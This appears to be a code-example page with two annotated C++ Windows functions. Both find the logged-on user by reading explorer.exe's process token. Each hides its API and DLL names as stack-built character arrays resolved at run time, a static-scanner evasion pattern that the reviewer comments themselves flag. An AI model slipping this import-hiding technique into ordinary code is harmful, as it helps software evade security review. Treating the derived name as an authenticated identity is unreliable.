Exemple #1
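// Returns the account name that owns the process GetProcessID() reports for
// "explorer.exe", as an ANSI string allocated with new char[]. Returns NULL on
// any failure. The caller owns the returned buffer and must release it with
// delete[].
//
// NOTE(review): the "logged-on user" is inferred from a process image name.
// Any user can start a process called explorer.exe, and a multi-session host
// has one per session, so the result identifies "an owner of some
// explorer.exe", not an authenticated identity. Do not base authorization
// decisions on it. WTSQuerySessionInformation with WTSUserName is the
// session-aware way to ask this question. GetProcessID() is defined outside
// this block; its matching rules are not visible here.
//
// NOTE(review): the four APIs are resolved at run time with GetProcAddress and
// the ADVAPI32 name is assembled character by character on the stack. The
// effect is that the token APIs are absent from the import table and the DLL
// name is not a contiguous string in the binary. Reviewers and static scanners
// treat that combination as a reason to look closer; ordinary code would call
// the APIs directly.
char *GetLogUser2K()
{
	typedef BOOL
		(WINAPI
		*OpenProcessTokenT)(
		__in        HANDLE ProcessHandle,
		__in        DWORD DesiredAccess,
		__deref_out PHANDLE TokenHandle
		);
	char KIoFqQPSy[] = {'A','D','V','A','P','I','3','2','.','d','l','l','\0'};
	OpenProcessTokenT pOpenProcessToken=(OpenProcessTokenT)GetProcAddress(LoadLibrary(KIoFqQPSy),"OpenProcessToken");

	typedef BOOL
		(WINAPI
		*LookupAccountSidAT)(
		__in_opt LPCSTR lpSystemName,
		__in PSID Sid,
		__out_ecount_part_opt(*cchName, *cchName + 1) LPSTR Name,
		__inout  LPDWORD cchName,
		__out_ecount_part_opt(*cchReferencedDomainName, *cchReferencedDomainName + 1) LPSTR ReferencedDomainName,
		__inout LPDWORD cchReferencedDomainName,
		__out PSID_NAME_USE peUse
		);
	LookupAccountSidAT pLookupAccountSidA=(LookupAccountSidAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"LookupAccountSidA");

	typedef BOOL
		(WINAPI
		*GetTokenInformationT)(
		__in      HANDLE TokenHandle,
		__in      TOKEN_INFORMATION_CLASS TokenInformationClass,
		__out_bcount_part_opt(TokenInformationLength, *ReturnLength) LPVOID TokenInformation,
		__in      DWORD TokenInformationLength,
		__out_opt PDWORD ReturnLength
		);
	GetTokenInformationT pGetTokenInformation=(GetTokenInformationT)GetProcAddress(LoadLibrary(KIoFqQPSy),"GetTokenInformation");

	typedef HANDLE
		(WINAPI
		*OpenProcessT)(
		__in DWORD dwDesiredAccess,
		__in BOOL bInheritHandle,
		__in DWORD dwProcessId
		);
	OpenProcessT pOpenProcess=(OpenProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"OpenProcess");

	// GetProcAddress returns NULL when the module or export cannot be found.
	// Calling through a NULL pointer would crash, so fail cleanly instead.
	if (pOpenProcessToken == NULL || pLookupAccountSidA == NULL ||
		pGetTokenInformation == NULL || pOpenProcess == NULL)
		return NULL;

	DWORD	dwProcessID = GetProcessID("explorer.exe");
	if (dwProcessID == 0)
		return NULL;

	BOOL fResult  = FALSE;
	BOOL fNameValid = FALSE;	// set only once lpUserName holds a looked-up name
	HANDLE hProc  = NULL;
	HANDLE hToken = NULL;
	BYTE *pTokenBuf = NULL;
	char	*lpUserName = NULL;
	__try
	{
		// Query-only access is all that is requested on the target process.
		// NOTE(review): on Vista and later PROCESS_QUERY_LIMITED_INFORMATION is
		// sufficient for OpenProcessToken and is the narrower right; the "2K"
		// in the name suggests an older target where it does not exist.
		hProc = pOpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwProcessID);
		if (hProc == NULL)
		{
			__leave;
		}
		fResult = pOpenProcessToken(hProc, TOKEN_QUERY, &hToken);
		if(!fResult)
		{
			__leave;
		}

		// First call is a size probe: it is expected to fail and report the
		// required byte count in dwNeedLen.
		DWORD dwNeedLen = 0;
		fResult = pGetTokenInformation(hToken,TokenUser, NULL, 0, &dwNeedLen);
		if (dwNeedLen == 0)
		{
			__leave;
		}

		pTokenBuf = new BYTE[dwNeedLen];
		fResult = pGetTokenInformation(hToken,TokenUser, pTokenBuf, dwNeedLen, &dwNeedLen);
		if (!fResult)
		{
			__leave;
		}
		TOKEN_USER *pTokenUser = (TOKEN_USER*)pTokenBuf;

		SID_NAME_USE sn;
		// LookupAccountSidA writes ANSI text, so the domain buffer must be char
		// (a TCHAR buffer is the wrong element type in a UNICODE build).
		char szDomainName[MAX_PATH];
		DWORD dwDmLen = MAX_PATH;

		DWORD	nNameLen = 256;
		lpUserName = new char[256];

		fResult = pLookupAccountSidA(NULL, pTokenUser->User.Sid, lpUserName, &nNameLen,
			szDomainName, &dwDmLen, &sn);
		if (fResult)
			fNameValid = TRUE;
	}
	__finally
	{
		if (hProc)
			::CloseHandle(hProc);
		if (hToken)
			::CloseHandle(hToken);
		// Released with the same element type it was allocated with.
		if (pTokenBuf)
			delete[] pTokenBuf;
		// A failed or interrupted lookup leaves the name buffer uninitialized;
		// never hand that back to the caller as if it were a user name.
		if (!fNameValid && lpUserName)
		{
			delete[] lpUserName;
			lpUserName = NULL;
		}
	}

	// The return sits outside __finally: returning from inside a termination
	// handler discards an exception that is in the middle of unwinding.
	return lpUserName;
}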
Exemple #2
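//================= Get the current logged-on user name and computer (domain) name =================
// Looks up the account that owns the token GetTokenByName() returns for
// "EXPLORER.EXE" and copies its user name into szUser and its domain name
// into szDomain. Returns TRUE on success, FALSE on any failure.
//
// Buffer contract: the function tells LookupAccountSidA that each output
// buffer holds 50 characters. The signature carries no length, so this cannot
// be checked here; a caller passing a smaller array gets a buffer overflow.
// Both arrays must be at least 50 chars. Names that need more than 50 chars
// make the lookup fail and the function return FALSE.
//
// NOTE(review): the identity comes from a process image name, which any user
// can reproduce and which exists once per session on a multi-session host.
// Treat the result as informational, not as an authenticated identity.
// GetTokenByName() is defined outside this block; presumably it fills hToken
// through a reference parameter - confirm against its declaration.
//
// NOTE(review): every API name below is built on the stack one character at a
// time and resolved with GetProcAddress, so the names are neither in the
// import table nor present as contiguous strings. That is a pattern analysts
// flag during static triage; code with nothing to hide calls these APIs
// directly. The *T function-pointer typedefs are declared elsewhere.
BOOL GetCurrentUserName(char szUser[],char szDomain[])
{
    if (szUser == NULL || szDomain == NULL)
    {
        return FALSE;
    }

    // Resolve every entry point up front so a missing export is caught before
    // any handle or heap block exists that would need cleaning up.
	char JwFNw01[] = {'G','e','t','T','o','k','e','n','I','n','f','o','r','m','a','t','i','o','n','\0'};
	GetTokenInformationT pGetTokenInformation=(GetTokenInformationT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),JwFNw01);
	char BrmAP29[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'};
	CloseHandleT pCloseHandle=(CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),BrmAP29);
	char JwFNw02[] = {'G','e','t','P','r','o','c','e','s','s','H','e','a','p','\0'};
	GetProcessHeapT pGetProcessHeap=(GetProcessHeapT)GetProcAddress(LoadLibrary("KERNEL32.dll"),JwFNw02);
	char JwFNw03[] = {'H','e','a','p','A','l','l','o','c','\0'};
	HeapAllocT pHeapAlloc=(HeapAllocT)GetProcAddress(LoadLibrary("KERNEL32.dll"),JwFNw03);
	char JwFNw05[] = {'H','e','a','p','F','r','e','e','\0'};
	HeapFreeT pHeapFree=(HeapFreeT)GetProcAddress(LoadLibrary("KERNEL32.dll"),JwFNw05);
	char JwFNw06[] = {'L','o','o','k','u','p','A','c','c','o','u','n','t','S','i','d','A','\0'};
	LookupAccountSidAT pLookupAccountSidA=(LookupAccountSidAT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),JwFNw06);

    // GetProcAddress yields NULL on failure; calling through it would crash.
    if (!pGetTokenInformation || !pCloseHandle || !pGetProcessHeap ||
        !pHeapAlloc || !pHeapFree || !pLookupAccountSidA)
    {
        return FALSE;
    }

    // Get the shell's token.
    HANDLE hToken = NULL;
    if(!GetTokenByName(hToken,"EXPLORER.EXE"))
	{
        return FALSE;
	}

    BOOL         fOk      = FALSE;
    DWORD        cbti     = 0;
    PTOKEN_USER  ptiUser  = NULL;
    SID_NAME_USE snu;

    // Size probe: with a NULL buffer the call is expected to FAIL and report
    // the required byte count in cbti. Success or a zero size is an error.
    if (!pGetTokenInformation(hToken, TokenUser, NULL, 0, &cbti) && cbti > 0)
	{
        // Allocate the TOKEN_USER buffer.
        ptiUser = (PTOKEN_USER) pHeapAlloc(pGetProcessHeap(), 0, cbti);

        // Fetch the token information.
        if (ptiUser && pGetTokenInformation(hToken, TokenUser, ptiUser, cbti, &cbti))
		{
            // Capacity reported to the lookup; see the buffer contract above.
            DWORD nUser = 50;
            DWORD nDomain = 50;

            // Translate the user's SID into a user name and domain.
            if (pLookupAccountSidA(NULL, ptiUser->User.Sid, szUser, &nUser, szDomain, &nDomain, &snu))
			{
                fOk = TRUE;
			}
		}
	}

    // Single cleanup path for every outcome.
    if (ptiUser)
	{
        pHeapFree(pGetProcessHeap(), 0, ptiUser);
	}
    pCloseHandle(hToken);

    return fOk;
}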